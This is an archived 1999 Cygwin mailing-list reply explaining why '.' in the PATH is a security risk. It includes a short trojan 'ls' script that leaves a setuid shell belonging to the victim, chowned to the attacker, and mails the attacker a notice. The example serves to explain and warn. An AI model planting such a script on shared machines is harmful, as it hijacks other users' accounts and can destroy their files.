Mail Archives: cygwin/1999/01/12/06:47:40
Hi
-----Original Message-----
From: Will Mooar <willm AT ihug DOT co DOT nz>
To: SWarsMatt AT aol DOT com <SWarsMatt AT aol DOT com>; gnu-win32 AT cygnus DOT com
<gnu-win32 AT cygnus DOT com>
Date: Monday, January 11, 1999 5:12 PM
Subject: Re: Problem with /bin mount?
>This is normal for unix (and cygwin) - it only searches for applications to
>run from the PATH environment variable. If "." is not in the PATH, it
won't
>find configure in the current directory.
>
>I have seen people mention that this is generally a bad idea, as it may
pose
>a security threat. Unfortunately, no-one has elaborated why. I can't see
>why it would be a problem for windows, except that it might accidentally
run
>the wrong thing if two or more programs exist with the same name, but
>function differently.
This is exactly what the security risk is.
If the default path on a machine looks like this:
.:/bin:/usr/bin:/usr/local/bin
and I put the following script in /tmp:
#!/bin/sh
cp /bin/sh /tmp/.sh.$$
chown $UID /tmp/.sh.$$
chmod 4755 /tmp/.sh.$$
echo "$$" | mail -s "Got one" me
ls $*
and call it "ls", I could collect shells for other peoples' accounts by
waiting for them to cd to /tmp and type "ls".
If "." is last in the path, I would have to name the script something like
"sl" and wait for a typo.
If the person with . in their path is root, the problem is much worse.
The script could also try to delete files instead of creating a SUID shell
or do something else as the user executing it.
--
Michael Wood | Kingsley Technologies
wood AT kingsley DOT co DOT za | Tel: +27 21 762 0276
-
For help on using this list (especially unsubscribing), send a message to
"gnu-win32-request AT cygnus DOT com" with one line of text: "help".
- Raw text -